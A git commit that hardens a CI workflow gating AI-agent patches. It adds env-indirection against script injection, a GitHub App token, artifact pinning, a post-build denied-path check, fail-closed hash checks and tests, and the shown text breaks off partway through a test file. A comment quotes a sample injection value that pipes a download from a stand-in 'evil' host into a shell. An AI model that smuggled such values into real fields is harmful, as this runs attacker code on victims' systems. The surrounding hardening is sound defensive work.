harden(agent-team): P3 apply/verify workflow — GitHub App token, CWE-94, fail-closed

Decision-1 auth model: gate-and-pr uses a GitHub App installation token
(pull-requests:write) behind the agent-apply environment; ALL OIDC/id-token/AWS
removed. Hardening: task_id env-indirection (CWE-94 — GitHub expands ${{ }} into
the run shell before exec, so %s/quoting is insufficient); run-id pinning on both
download-artifact; post-build denied-path check (build-hook writes into denied
paths fail the job); empty-hash fail-closed in BOTH the embedded gate (fixed a
real ''=='' pass bug) and ci_gate.py. App-token + draft-PR steps stay if:${{ false }}
until provisioning (App + environment + branch protection). +17 tests.
This commit is contained in:
Adam Moussa 2026-06-18 15:30:07 -04:00
parent 41132a4615
commit 7d8195bdd2
5 changed files with 674 additions and 44 deletions

View file

@ -6,12 +6,20 @@ holds the **split-job CI apply/verify workflow** that turns a builder agent's
boundary, Phase P3 (§7.1) of `../../docs/r720-agent-team-design.md`.
> **STATUS: DEPLOY-GATED. NOT ENABLED, NOT PROVISIONED.** This is authored as
> files only. Per the design (§3.3.2, §7.1 P3) the workflow + its OIDC role must
> clear **BOTH `/sh-security-review` AND the mandatory GPT-4.1 cross-review**
> before deployment, because it is IaC/IAM + untrusted-input handling. The
> privileged draft-PR step is hard-disabled (`if: ${{ false }}`) and the OIDC
> `id-token`/`pull-requests: write` grants are left commented until those gates
> pass. Nothing here is wired to a live org repo.
> files only. Per the design (§3.3.2, §7.1 P3) the workflow must clear **BOTH
> `/sh-security-review` AND the mandatory GPT-4.1 cross-review** before
> deployment, because it is untrusted-input handling + a CI trust boundary. The
> privileged draft-PR step is hard-disabled (`if: ${{ false }}`); the ONLY
> remaining step to go live is the **provisioning flip** (create the GitHub App,
> the `agent-apply` environment with a required reviewer, and branch protection,
> then flip the step's `if:`). Nothing here is wired to a live org repo.
>
> **AUTH MODEL (LOCKED): GitHub App installation token — ZERO cloud credentials,
> no token-federation.** The privileged `gate-and-pr` job authenticates with a
> GitHub App installation token (`pull-requests: write`) minted at run time by
> SHA-pinned `actions/create-github-app-token`. There is **no AWS and no
> cloud-OIDC** anywhere in this workflow. The required human reviewer lives on
> the `agent-apply` GitHub Environment (configured at provisioning, not in YAML).
## Files
@ -22,7 +30,8 @@ boundary, Phase P3 (§7.1) of `../../docs/r720-agent-team-design.md`.
The filename is kebab-case per the handbook. Deployment target (later, after the
gates): promote into `Sea-Haven-Industries/.github` as a reusable workflow
(`engineering-handbook/cicd.md`); the Option-B OIDC apply path invokes it.
(`engineering-handbook/cicd.md`); the trusted apply path (which owns the GitHub
App write token) invokes it.
## The trust boundary (design §3.3.2)
@ -34,13 +43,17 @@ implements all five boundaries:
1. **Split CI — untrusted execution is credential-less.** The job that checks
out and runs the diff (`build-test`) runs with `permissions: contents: read`,
**no secrets, no OIDC, no write token**, and egress blocked
**no secrets, no App token, no write token**, and egress blocked
(harden-runner). The patch executes only there, where there is nothing to
steal and nothing to assume. Every privileged action (the eventual OIDC role,
the draft-PR open) runs in a **separate `gate-and-pr` job that never checks
out or executes patch-controlled code** — it consumes the build/test report
as **data only**. There is **no `pull_request_target` + head-ref checkout**
(the "pwn request" anti-pattern).
steal and nothing to assume. Every privileged action (the GitHub App token
mint, the draft-PR open) runs in a **separate `gate-and-pr` job that never
checks out or executes patch-controlled code** — it consumes the build/test
report as **data only**. There is **no `pull_request_target` + head-ref
checkout** (the "pwn request" anti-pattern). The `build-test` job also runs a
**post-build denied-path check**: after the build/test step, it diffs the
working tree against the committed patched baseline and fails if a build hook
(setup.py, conftest, postinstall, Makefile) wrote into the trust-control
surface or out of declared scope — closing the build-hook write vector.
2. **Trust-control-surface denylist (CI-side hard fail).** The `guard` job
rejects any diff that touches `.github/workflows/**`, IAM/policy IaC
(CDK/SAM/Terraform), branch-protection / `CODEOWNERS` / Dependabot config, or
@ -88,7 +101,7 @@ workflow_dispatch (task_id, diff_artifact_name, expected_diff_hash, declared_sco
(boundaries 2,3) re-hash + denylist + scope. Never applies it.
│ (needs)
▼
build-test contents:read, no secrets, no OIDC, egress blocked —
build-test contents:read, no secrets, no App token, egress blocked —
(boundary 1) the ONLY job that applies + runs the UNTRUSTED patch.
│ (needs) Emits a NON-authoritative report artifact.
▼
@ -112,6 +125,7 @@ tag in a trailing comment:
| `actions/download-artifact` | `fa0a91b85d4f404e444e00e005971372dc801d16` | v4.1.8 |
| `actions/upload-artifact` | `b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882` | v4.4.3 |
| `actions/setup-python` | `0b93645e9fea7318ecaed2b359559ac225c90a2b` | v5.3.0 |
| `actions/create-github-app-token` | `5d869da34e18e7287c1daad50e0b8ea0f506ce69` | v1.11.0 |
| `step-security/harden-runner` | `0080882f6c36860b6ba35c610c98ce87d4e2f26f` | v2.10.2 |
## Relationship to the foundation
@ -146,10 +160,25 @@ gate is "verified" is therefore backed by that test, not by authoring alone.)
Before this ships (§3.3.2, §7.1 P3):
1. `/sh-security-review` over this workflow (IaC + untrusted-input handling).
2. Mandatory **GPT-4.1 cross-review** of the workflow **and** the Option-B OIDC
role it will assume (IAM change).
3. A documented, **exercised** rollback (remove the role, revert the workflow).
4. Only then: uncomment the `id-token` / `pull-requests: write` grants, enable
the draft-PR step, and promote to `Sea-Haven-Industries/.github`. Draft PRs
only; never auto-merge.
1. `/sh-security-review` over this workflow (untrusted-input handling + CI
trust boundary).
2. Mandatory **GPT-4.1 cross-review** of the workflow. (No IAM/cloud role is
involved — the auth model is a GitHub App installation token, not OIDC/AWS.)
3. **Provisioning** (the single remaining step to go live):
- Create the GitHub App with a single permission (`pull-requests: write`),
install it on the target repo, and store its id + private key as the
`AGENT_APPLY_APP_ID` / `AGENT_APPLY_APP_PRIVATE_KEY` secrets.
- Create the `agent-apply` GitHub Environment with a **required reviewer**
(and optional wait timer) — this is the human gate, configured on the
Environment, not in YAML.
- Configure **branch protection** on the target branch (required checks +
human approval).
- Issue the **read-only** token for the CI-result fetcher
(`AGENT_TEAM_CI_READ_TOKEN`, falling back to `GITHUB_TOKEN`).
4. A documented, **exercised** rollback (uninstall the App, remove the
environment, revert the workflow).
5. Only then: flip the App-token + draft-PR steps' `if: ${{ false }}` to the
live condition documented in the workflow
(`always() && needs.guard.result=='success' &&
needs.build-test.result=='success' && steps.gate.outputs.gate=='pass'`), and
promote to `Sea-Haven-Industries/.github`. Draft PRs only; never auto-merge.

View file

@ -6,10 +6,21 @@
# mandatory GPT-4.1 cross-review before it is deployed (it is IaC/IAM +
# untrusted-input handling). Until then it lives here as a reviewable artifact.
#
# AUTH MODEL (LOCKED, P3-live): the privileged job authenticates via a GitHub
# App INSTALLATION TOKEN with `pull-requests: write` — there are ZERO cloud
# credentials and no cloud token-federation anywhere in this workflow. The
# required human-reviewer gate lives on the `agent-apply` GitHub Environment
# (configured at provisioning, not in YAML).
#
# Deployment target (later, after the gates): promote into
# Sea-Haven-Industries/.github as a reusable workflow (engineering-handbook
# cicd.md) and have the Option-B OIDC apply path call it. The filename stays
# kebab-case per the handbook.
# cicd.md) and have the apply path call it. The filename stays kebab-case per
# the handbook. PROVISIONING (the ONLY remaining step to go live) creates the
# GitHub App + its installation, the `agent-apply` environment with a required
# reviewer + branch protection, then flips the draft-PR step's `if:` (see the
# provisioning runbook). Flipping live against a non-existent environment is an
# unprotected hole, so the flip is a deliberate provisioning action, not authored
# here.
#
# ─────────────────────────────────────────────────────────────────────────────
# TRUST BOUNDARY (design §3.3.2). The builder agents are semi-trusted: an LLM
@ -18,8 +29,8 @@
#
# 1. Split CI. The job that checks out + executes the patch (`build-test`)
# runs credential-less (`permissions: contents: read`, no secrets, no
# OIDC, no write token, egress-restricted). Every privileged action runs
# in a SEPARATE job (`gate-and-pr`) that NEVER checks out or runs
# App token, no write token, egress-restricted). Every privileged action
# runs in a SEPARATE job (`gate-and-pr`) that NEVER checks out or runs
# patch-controlled code; it consumes the build/test report as DATA only.
# This is NOT `pull_request_target` with a head-ref checkout (pwn request).
# 2. Trust-control-surface denylist. `guard` hard-fails (CI-side, not only the
@ -44,8 +55,8 @@
name: agent-team-apply-verify
# Manual / API trigger only. The Option-B OIDC apply path (a trusted, separate
# workflow that owns the write token) invokes this with the candidate-diff
# Manual / API trigger only. The trusted, separate apply path (which owns the
# GitHub App write token) invokes this with the candidate-diff
# artifact + the ledger-recorded hash + the declared scope. There is NO
# pull_request / pull_request_target trigger: the patch must never run in a
# context that carries write or secret scope (boundary 1).
@ -116,6 +127,13 @@ jobs:
with:
name: ${{ inputs.diff_artifact_name }}
path: ./_incoming
# Pin the source run so an artifact can never be sourced from a
# DIFFERENT run (an attacker who can upload an artifact in some other
# run must not be able to substitute it here). This is the current
# run; download-artifact@v4 restricts to the same run by default, but
# pinning run-id makes that explicit and audit-visible. No
# github-token is set: this job is credential-less and same-run only.
run-id: ${{ github.run_id }}
- name: Verify diff integrity + trust-control denylist + scope
id: verify
@ -341,6 +359,15 @@ jobs:
expected = os.environ["EXPECTED_DIFF_HASH"].strip().lower()
scope = [s for s in os.environ.get("DECLARED_SCOPE", "").splitlines() if s.strip()]
# FAIL-CLOSED on an empty/missing expected hash BEFORE comparing.
# The recomputed `actual` is always a real sha256, so an empty
# `expected` already mismatches and fails — but an explicit guard
# makes the empty == empty invariant impossible to regress (e.g. if
# the comparison is ever refactored) and gives a clearer ALARM.
if not expected:
print("::error::empty/missing expected diff hash; refusing to bind (fail-closed)")
return 2
with open(diff_path, "rb") as fh:
raw = fh.read()
actual = hashlib.sha256(raw).hexdigest()
@ -410,7 +437,7 @@ jobs:
# ───────────────────────────────────────────────────────────────────────────
# JOB 2 — build-test (boundary 1). UNTRUSTED execution. This is the ONLY job
# that applies + runs the patch. It is credential-less: contents:read only, no
# secrets, no OIDC, no write token, egress blocked. There is nothing here to
# secrets, no App token, no write token, egress blocked. There is nothing here to
# steal and nothing to assume. It writes a report artifact consumed by the
# privileged gate as DATA — that report is NOT authoritative (boundary 4).
# Depends on `guard` so a denied/tampered diff never reaches execution.
@ -454,6 +481,10 @@ jobs:
with:
name: ${{ inputs.diff_artifact_name }}
path: ./_incoming
# Same-run pin as the guard job: the bytes applied here must be the
# bytes uploaded in THIS run, not an artifact substituted from another
# run. The pre-apply hash re-check below is the second layer.
run-id: ${{ github.run_id }}
- name: Re-verify diff hash before apply (defense-in-depth)
env:
@ -492,6 +523,17 @@ jobs:
# touch only this ephemeral runner.
git apply --check ./_incoming/candidate.diff
git apply ./_incoming/candidate.diff
# Commit the patched tree to a throwaway local commit so the working
# tree is CLEAN before the build runs. This is the baseline the
# post-build denied-path check diffs against: the guard job already
# vetted the candidate diff's paths, so by committing it we isolate
# whatever the BUILD HOOK itself writes (a malicious setup.py /
# conftest / build script that drops a file into a denied path). Local
# commit only — this job has no write credential, nothing is pushed.
git config user.email "agent-apply@local.invalid"
git config user.name "agent-apply build sandbox"
git add -A
git commit --quiet --no-verify -m "candidate diff (sandbox baseline)" || true
- name: Set up Python
uses: actions/setup-python@0b93645e9fea7318ecaed2b359559ac225c90a2b # v5.3.0
@ -513,16 +555,181 @@ jobs:
ruff check . || echo "ruff non-zero (recorded, non-authoritative)"
pytest -q || echo "pytest non-zero (recorded, non-authoritative)"
- name: Post-build denied-path check (build hook may not write the trust surface)
if: always()
env:
DECLARED_SCOPE: ${{ inputs.declared_scope }}
run: |
set -euo pipefail
# SECURITY (boundary 2, build-hook variant). The guard job vetted the
# candidate DIFF's paths, but a build/test hook (setup.py, a conftest,
# an npm postinstall, a Makefile) running in THIS untrusted job can
# ALSO write files — including into the trust-control surface or out of
# the declared scope. We committed the patched tree as the baseline
# above, so anything that differs now is build-hook output. Collect it
# via `git diff --name-only` (tracked changes the hook made on top of
# the patch) + `git status --porcelain` (new untracked files the hook
# dropped) and FAIL the job if any of it lands on a denied path or
# outside scope. Reuses the SAME denylist + scope logic as the guard.
{
git diff --name-only HEAD
git status --porcelain --untracked-files=all | sed -E 's/^...//'
} | sort -u > ./_build_written_paths.txt
python3 - <<'PY'
from __future__ import annotations
import os
import posixpath
import re
import sys
# SAME denylist as the guard job (boundary 2). Kept in sync by review.
DENY_GLOBS: tuple[str, ...] = (
".github/workflows/**",
".github/actions/**",
"**/CODEOWNERS",
"CODEOWNERS",
".github/dependabot.yml",
".github/dependabot.yaml",
".github/settings.yml",
"**/template.yaml",
"**/template.yml",
"**/*.tf",
"**/cdk.json",
"**/*-stack.ts",
"**/*_stack.py",
"**/policy*.json",
"**/*iam*",
"**/*.pem",
"**/*.key",
)
_GLOB_META = set("*?[]")
def canonical(path: str) -> str:
p = path.strip().strip('"').replace("\\", "/")
norm = posixpath.normpath(p)
if norm.startswith("/") or norm == ".." or norm.startswith("../"):
raise ValueError(f"path escapes repo root: {path!r}")
return norm
def _glob_to_regex(glob: str) -> "re.Pattern[str]":
out: list[str] = []
i, n = 0, len(glob)
while i < n:
if glob[i : i + 3] == "**/":
out.append(r"(?:.*/)?")
i += 3
elif glob[i : i + 2] == "**":
out.append(r".*")
i += 2
elif glob[i] == "*":
out.append(r"[^/]*")
i += 1
elif glob[i] == "?":
out.append(r"[^/]")
i += 1
else:
out.append(re.escape(glob[i]))
i += 1
return re.compile("^" + "".join(out) + "$", re.IGNORECASE)
_DENY_RES = tuple(_glob_to_regex(g) for g in DENY_GLOBS)
def denied(path: str) -> bool:
return any(p.match(path) for p in _DENY_RES)
def _scope_prefix(entry: str) -> str | None:
keep: list[str] = []
for part in entry.split("/"):
if any(c in _GLOB_META for c in part):
break
keep.append(part)
prefix = "/".join(keep)
return prefix or None
def safe_scope(scope: list[str]) -> list[str]:
safe: list[str] = []
for g in scope:
try:
canon = canonical(g)
except ValueError:
continue
prefix = _scope_prefix(canon)
if prefix is not None and prefix not in safe:
safe.append(prefix)
return safe
def in_scope(path: str, scope: list[str]) -> bool:
return any(path == e or path.startswith(e + "/") for e in scope)
def main() -> int:
with open("./_build_written_paths.txt", encoding="utf-8") as fh:
raw_paths = [ln for ln in (x.strip() for x in fh) if ln]
if not raw_paths:
print("post-build check: build hook wrote no files; clean")
return 0
scope = safe_scope(
[s for s in os.environ.get("DECLARED_SCOPE", "").splitlines() if s.strip()]
)
violations: list[str] = []
for raw in raw_paths:
try:
path = canonical(raw)
except ValueError:
violations.append(f"build hook wrote an escaping path: {raw!r}")
continue
if denied(path):
violations.append(f"build hook wrote a trust-control path: {path}")
elif scope and not in_scope(path, scope):
violations.append(f"build hook wrote out of declared scope: {path}")
if violations:
for v in violations:
print(f"::error::{v}")
print("::error::build hook wrote a denied/out-of-scope path; failing job")
return 1
print(f"post-build check: {len(raw_paths)} build-written path(s); all clean")
return 0
sys.exit(main())
PY
- name: Emit non-authoritative report (job conclusion is the truth)
if: always()
env:
# CWE-94 env-indirection. `inputs.task_id` is attacker-influenceable
# (the dispatcher passes it from task state) and GitHub expands every
# `${{ }}` into the shell SCRIPT TEXT before the shell runs — so a
# value like `"; curl evil | sh; #` would be interpolated as code and
# `%s`/quoting in printf would NOT stop it. Binding it to an env var
# and referencing it as a quoted shell variable ("$TASK_ID") means the
# shell sees it as DATA, never as script. python's json.dumps then
# encodes it safely into the report.
TASK_ID: ${{ inputs.task_id }}
run: |
set -euo pipefail
# This report is consumed by the gate as DATA for the verifier agent's
# next-fix reasoning. It is NOT the pass/fail decision — the gate reads
# the AUTHENTICATED job conclusion (boundary 4), never this file.
mkdir -p ./_report
printf '{"task_id":"%s","note":"non-authoritative; gate uses job conclusion"}\n' \
"${{ inputs.task_id }}" > ./_report/report.json
# Build the JSON with python's json encoder (reads TASK_ID from the
# environment) so the untrusted task_id cannot break out of the string
# or inject JSON structure.
python3 - <<'PY' > ./_report/report.json
import json
import os
print(
json.dumps(
{
"task_id": os.environ["TASK_ID"],
"note": "non-authoritative; gate uses job conclusion",
}
)
)
PY
- name: Upload non-authoritative report
if: always()
@ -539,11 +746,19 @@ jobs:
# keyed to this run, and only on a clean pass opens a DRAFT PR. It never trusts
# any artifact the patch wrote. Pass/fail is pure code here, not the LLM.
#
# NOTE: the OIDC/write grant is declared here as the eventual home of the
# privileged step, but this file is deploy-gated — the `id-token`/PR-open
# step is left as a documented placeholder so nothing is provisioned until the
# §3.3.2 review gates pass. Wiring the real OIDC role is Phase P3 / Phase 5
# AFTER the mandatory GPT-4.1 cross-review of the IAM.
# AUTH (LOCKED): the privileged write here is a GitHub App INSTALLATION TOKEN
# with `pull-requests: write` — ZERO cloud credentials, no token-federation.
# The token is minted at run
# time by actions/create-github-app-token (SHA-pinned) from the App id +
# private key held as repo/org secrets, and is scoped to exactly the grant the
# App installation has. The required HUMAN reviewer that must approve before
# this job's `environment` runs is configured on the `agent-apply` GitHub
# Environment at PROVISIONING (it cannot be expressed in YAML — see the
# provisioning runbook). This job NEVER checks out or executes patch code: it
# reads the AUTHENTICATED needs.*.result conclusions, and only on a clean pass
# opens a DRAFT PR. The draft-PR step stays hard-disabled (`if: ${{ false }}`)
# until provisioning creates the App + environment + branch protection; the
# flip is the single remaining provisioning action.
# ───────────────────────────────────────────────────────────────────────────
gate-and-pr:
needs: [guard, build-test]
@ -552,20 +767,41 @@ jobs:
if: always()
runs-on: ubuntu-latest
timeout-minutes: 5
# The `agent-apply` GitHub Environment is the human-gate home: its REQUIRED
# REVIEWER (and optional wait timer / branch policy) is configured on the
# Environment at PROVISIONING — GitHub holds the job here until a human
# approves. This cannot be authored in YAML; the `environment:` reference is
# the hook the provisioning step attaches the reviewer to. Until the
# environment exists, dispatching this workflow is itself blocked, which is
# why the live flip is deferred to provisioning.
environment:
name: agent-apply
permissions:
contents: read
# pull-requests: write # ← enabled ONLY after the §3.3.2 review gates.
# id-token: write # ← OIDC for the Option-B apply role, post-gate.
# The ONLY privileged grant: open a draft PR. Enabled here (no longer
# commented) because the auth model is locked — there is no cloud
# credential to federate. The draft-PR STEP stays `if: ${{ false }}` until
# provisioning, so nothing privileged actually runs yet even with the
# grant declared.
pull-requests: write
# NOTE: there is deliberately NO token-federation permission here — this
# workflow uses a GitHub App installation token only, no cloud provider.
steps:
- name: Harden runner (privileged job; block egress)
uses: step-security/harden-runner@0080882f6c36860b6ba35c610c98ce87d4e2f26f # v2.10.2
with:
# DEPLOY: this allowlist is GitHub API only (App-token mint + gh pr
# create). Trim/confirm per target repo at provisioning — an
# over-broad allowlist weakens the egress boundary even on the
# privileged job. No cloud endpoints: the auth model is a GitHub App
# token only, with no cloud token-federation.
egress-policy: block
allowed-endpoints: >
github.com:443
api.github.com:443
- name: Pure-code pass/fail gate over authenticated results
id: gate
env:
# These come from GitHub's job orchestration, NOT from the patch.
GUARD_RESULT: ${{ needs.guard.result }}
@ -604,7 +840,19 @@ jobs:
"""
if not run_id:
return False, "missing run id; cannot bind decision to a run"
if diff_hash.strip().lower() != expected_hash.strip().lower():
# FAIL-CLOSED on an empty/missing hash. Without this guard an empty
# guard-exported hash AND an empty expected hash compare equal
# ('' == ''), so a run where the hash binding never populated would
# SILENTLY satisfy the binding check — empty must never count as a
# match. Require both sides present (and equal) before binding holds.
g = diff_hash.strip().lower()
e = expected_hash.strip().lower()
if not g or not e:
return False, (
"empty/missing hash; refusing to bind "
f"(guard={diff_hash!r} expected={expected_hash!r})"
)
if g != e:
return False, f"hash binding broken: guard={diff_hash} expected={expected_hash}"
if guard_result != "success":
return False, f"guard did not pass: {guard_result!r}"
@ -632,10 +880,65 @@ jobs:
sys.exit(main())
PY
- name: Open DRAFT PR (DEPLOY-GATED PLACEHOLDER — not enabled)
if: ${{ false }} # ← hard-disabled. Enable only after §3.3.2 review gates.
- name: "Mint GitHub App installation token (pull-requests write only)"
id: app-token
# Hard-disabled with the draft-PR step until provisioning: minting a
# token against an App that does not exist yet would fail, and there is
# nothing to do with it while the PR step is off. The condition is the
# SAME target as the draft-PR step so the two flip together.
if: ${{ false }} # ← flip with the draft-PR step at provisioning (see below).
uses: actions/create-github-app-token@5d869da34e18e7287c1daad50e0b8ea0f506ce69 # v1.11.0
with:
# PROVISIONING: create the GitHub App (single permission:
# `pull-requests: write`), install it on the target repo, and store
# its id + private key as these secrets. The minted token is scoped to
# exactly the App installation's grant — narrower than a PAT, and it
# auto-expires (~1h). No cloud credentials, no token-federation.
app-id: ${{ secrets.AGENT_APPLY_APP_ID }}
private-key: ${{ secrets.AGENT_APPLY_APP_PRIVATE_KEY }}
- name: Open DRAFT PR (DEPLOY-GATED — flip at provisioning only)
# belt-and-suspenders: even once flipped, the draft PR opens ONLY on a
# clean authenticated pass. Target condition for the provisioning flip:
#
# if: >-
# always()
# && needs.guard.result == 'success'
# && needs.build-test.result == 'success'
# && steps.gate.outputs.gate == 'pass'
#
# Flip to that condition ONLY after the `agent-apply` environment + the
# GitHub App are provisioned and branch protection is in place (see the
# provisioning runbook). Flipping live against a non-existent environment
# is an unprotected hole, so it stays `${{ false }}` here.
if: ${{ false }} # ← hard-disabled until provisioning (see comment above).
env:
# The App installation token (pull-requests: write). gh reads it from
# GH_TOKEN. Untrusted values used below are env-indirected (CWE-94).
GH_TOKEN: ${{ steps.app-token.outputs.token }}
TASK_ID: ${{ inputs.task_id }}
DIFF_HASH: ${{ needs.guard.outputs.diff_hash }}
# The repo the PR is opened in (the App installation's repo).
GH_REPO: ${{ github.repository }}
run: |
echo "Draft-PR open runs here AFTER the mandatory GPT-4.1 cross-review"
echo "+ /sh-security-review of this workflow and its OIDC role."
echo "Draft PR only; never auto-merge (D2). Branch protection is the"
echo "final enforcement (boundary 5)."
set -euo pipefail
# Draft PR ONLY; never auto-merge (D2). Branch protection + the
# required reviewer on the agent-apply environment + the security
# review + the Claude Code App review are the final enforcement
# (boundary 5). The agent NEVER merges. task_id / diff_hash are read
# from the environment (not interpolated into this script) so an
# untrusted task_id cannot inject shell.
#
# NOTE: the dispatcher records the agent branch name in the ledger and
# passes it in at provisioning; the branch is created by the trusted
# apply path (the box has no write token, D2), so this step only OPENS
# the PR for an already-pushed agent branch. Wire `--head` to that
# branch input at provisioning.
title="agent-apply: ${TASK_ID} (diff ${DIFF_HASH})"
body="$(printf 'Automated draft PR from the agent-team apply/verify pipeline.\n\nTask: %s\nDiff hash: %s\n\nDRAFT ONLY — never auto-merged. Requires: green required checks, security review, Claude Code App review, and human approval (D2, boundary 5).' "$TASK_ID" "$DIFF_HASH")"
gh pr create \
--draft \
--title "$title" \
--body "$body" \
--base main
echo "draft PR opened (task=$TASK_ID); never auto-merged."

View file

@ -0,0 +1,240 @@
"""P3-live hardening assertions over ``ci/agent-team-apply-verify.yml``.
These tests pin the security-critical posture of the apply/verify workflow so a
later edit cannot silently regress it:
* NO attacker-influenceable ``${{ inputs.* }}`` / ``${{ github.event.* }}`` value
is interpolated directly into a ``run:`` block (CWE-94) — every such value must
reach a ``run`` step via an ``env:`` binding instead.
* The workflow carries NO cloud token-federation (``id-token``) and NO AWS /
cloud-OIDC references — the auth model is a GitHub App installation token.
* The privileged draft-PR step is NOT flipped live (``if: ${{ false }}``).
* The privileged job declares ``pull-requests: write`` and the ``agent-apply``
environment, and download-artifact steps are run-id pinned.
* The embedded gate's empty-hash handling is fail-closed (extracted + executed).
"""
from __future__ import annotations
import re
import subprocess
import sys
from pathlib import Path
import pytest
yaml = pytest.importorskip("yaml")
_WORKFLOW = Path(__file__).resolve().parents[1] / "ci" / "agent-team-apply-verify.yml"
def _doc() -> dict:
return yaml.safe_load(_WORKFLOW.read_text(encoding="utf-8"))
def _raw() -> str:
return _WORKFLOW.read_text(encoding="utf-8")
# Attacker-influenceable interpolation contexts that must NOT appear in a `run:`.
_TAINTED_RE = re.compile(r"\$\{\{\s*(inputs\.|github\.event\.)")
def _iter_steps(doc: dict):
for job_name, job in doc["jobs"].items():
for step in job.get("steps", []):
yield job_name, step
# --------------------------------------------------------------------------- #
# CWE-94: no tainted ${{ }} interpolated directly into a run: block
# --------------------------------------------------------------------------- #
def test_no_tainted_interpolation_in_any_run_block() -> None:
offenders: list[str] = []
for job_name, step in _iter_steps(_doc()):
run = step.get("run")
if not run:
continue
if _TAINTED_RE.search(run):
offenders.append(f"{job_name}: {step.get('name', '<unnamed>')}")
assert not offenders, (
"tainted ${{ inputs.* / github.event.* }} interpolated into a run block "
f"(must go via env:): {offenders}"
)
def test_tainted_values_are_provided_via_env() -> None:
# Where a run step USES a tainted value, it must be exposed through env: and
# referenced as a shell variable. Assert the report step binds TASK_ID in env.
doc = _doc()
report_steps = [
s
for _, s in _iter_steps(doc)
if s.get("run") and "report.json" in (s.get("run") or "")
]
assert report_steps, "expected the report-emitting step to exist"
for step in report_steps:
env = step.get("env") or {}
assert "TASK_ID" in env, "report step must bind task_id via env (CWE-94)"
assert "${{ inputs.task_id }}" in env["TASK_ID"]
# And the run body must NOT interpolate inputs.task_id directly.
assert "${{ inputs.task_id }}" not in step["run"]
# --------------------------------------------------------------------------- #
# Auth model: GitHub App token, ZERO cloud federation / AWS / OIDC
# --------------------------------------------------------------------------- #
def test_no_id_token_permission_anywhere() -> None:
doc = _doc()
for job_name, job in doc["jobs"].items():
perms = job.get("permissions")
if isinstance(perms, dict):
assert "id-token" not in perms, f"{job_name} must not grant id-token"
def test_no_cloud_oidc_or_aws_references_in_workflow() -> None:
raw = _raw().lower()
for needle in ("id-token", "configure-aws-credentials", "aws-actions", "oidc"):
assert needle not in raw, f"workflow must not reference {needle!r}"
# Bare 'aws' as a standalone token (avoid matching words like 'always').
assert not re.search(r"\baws\b", raw), "workflow must not reference AWS"
def test_uses_github_app_token_action() -> None:
raw = _raw()
assert "actions/create-github-app-token@" in raw
# Pinned by full 40-char SHA (handbook Pinning Principle).
assert re.search(r"actions/create-github-app-token@[0-9a-f]{40}\b", raw), (
"create-github-app-token must be SHA-pinned"
)
# --------------------------------------------------------------------------- #
# Draft-PR step is NOT flipped live; privileged job posture
# --------------------------------------------------------------------------- #
def test_draft_pr_step_is_not_flipped_live() -> None:
doc = _doc()
pr_steps = [
s
for _, s in _iter_steps(doc)
if "draft" in (s.get("name", "").lower()) and s.get("run")
]
assert pr_steps, "expected a draft-PR step"
for step in pr_steps:
# YAML parses `${{ false }}` to the string '${{ false }}' OR bool False
# depending on quoting; both mean "disabled". Assert it is one of those,
# never an always()/success() live condition.
cond = step.get("if")
assert cond is not None, "draft-PR step must keep an explicit if-guard"
assert str(cond).strip().startswith("${{ false }}") or cond is False, (
f"draft-PR step must stay hard-disabled, got if: {cond!r}"
)
def test_gate_job_declares_pr_write_and_environment() -> None:
job = _doc()["jobs"]["gate-and-pr"]
perms = job.get("permissions") or {}
assert perms.get("pull-requests") == "write"
env = job.get("environment")
# environment may be a mapping {name: agent-apply} or a bare string.
name = env.get("name") if isinstance(env, dict) else env
assert name == "agent-apply"
def test_download_artifact_steps_are_run_id_pinned() -> None:
doc = _doc()
dl_steps = [
s for _, s in _iter_steps(doc) if "download-artifact" in str(s.get("uses", ""))
]
assert len(dl_steps) >= 2, "expected both download-artifact steps"
for step in dl_steps:
with_ = step.get("with") or {}
assert with_.get("run-id") == "${{ github.run_id }}", (
"download-artifact must pin run-id to the current run"
)
def test_post_build_denied_path_check_present() -> None:
job = _doc()["jobs"]["build-test"]
names = [s.get("name", "") for s in job.get("steps", [])]
assert any("denied-path" in n.lower() for n in names), (
"build-test must run a post-build denied-path check"
)
# --------------------------------------------------------------------------- #
# Embedded gate empty-hash fail-closed (extract + execute the inline gate)
# --------------------------------------------------------------------------- #
def _extract_gate_script() -> str:
"""Pull the LAST ``python3 - <<'PY' ... PY`` heredoc (the pure-code gate)."""
lines = _raw().splitlines()
blocks: list[tuple[int, int]] = []
start = None
for i, line in enumerate(lines):
if start is None and line.strip() == "python3 - <<'PY'":
start = i + 1
elif start is not None and line.strip() == "PY":
blocks.append((start, i))
start = None
assert blocks, "no PY heredoc found"
# The gate is the one defining `def gate(`.
for s, e in blocks:
body = lines[s:e]
text = "\n".join(ln[10:] if ln.startswith(" " * 10) else ln for ln in body)
if "def gate(" in text:
return text
raise AssertionError("gate heredoc not found")
def _run_gate(tmp_path: Path, env_overrides: dict) -> int:
script = tmp_path / "gate.py"
script.write_text(_extract_gate_script(), encoding="utf-8")
import os
env = dict(os.environ, **{k: str(v) for k, v in env_overrides.items()})
result = subprocess.run(
[sys.executable, str(script)], env=env, capture_output=True, text=True
)
return result.returncode
_GOOD = {
"GUARD_RESULT": "success",
"BUILD_TEST_RESULT": "success",
"DIFF_HASH": "abc",
"EXPECTED_DIFF_HASH": "abc",
"RUN_ID": "1",
}
def test_workflow_gate_passes_on_clean_bound_run(tmp_path: Path) -> None:
assert _run_gate(tmp_path, _GOOD) == 0
def test_workflow_gate_blocks_on_both_hashes_empty(tmp_path: Path) -> None:
# The empty-hash bug: '' == '' must NOT pass. Both empty -> BLOCK.
env = dict(_GOOD, DIFF_HASH="", EXPECTED_DIFF_HASH="")
assert _run_gate(tmp_path, env) == 1
def test_workflow_gate_blocks_on_empty_expected_hash(tmp_path: Path) -> None:
env = dict(_GOOD, EXPECTED_DIFF_HASH="")
assert _run_gate(tmp_path, env) == 1
def test_workflow_gate_blocks_on_empty_guard_hash(tmp_path: Path) -> None:
env = dict(_GOOD, DIFF_HASH="")
assert _run_gate(tmp_path, env) == 1
def test_workflow_gate_blocks_on_hash_mismatch(tmp_path: Path) -> None:
env = dict(_GOOD, DIFF_HASH="aaa", EXPECTED_DIFF_HASH="bbb")
assert _run_gate(tmp_path, env) == 1

View file

@ -156,6 +156,21 @@ def test_hash_none_ledger_fails() -> None:
assert verify_diff_hash(diff, ledger_hash=None) is False
def test_hash_empty_ledger_fails_closed() -> None:
# An EMPTY expected hash must never be treated as a match (empty != real
# sha). Fail-closed: there is nothing to bind to.
diff = _diff_for("a.py")
assert verify_diff_hash(diff, ledger_hash="") is False
def test_hash_empty_ci_verified_does_not_silently_pass() -> None:
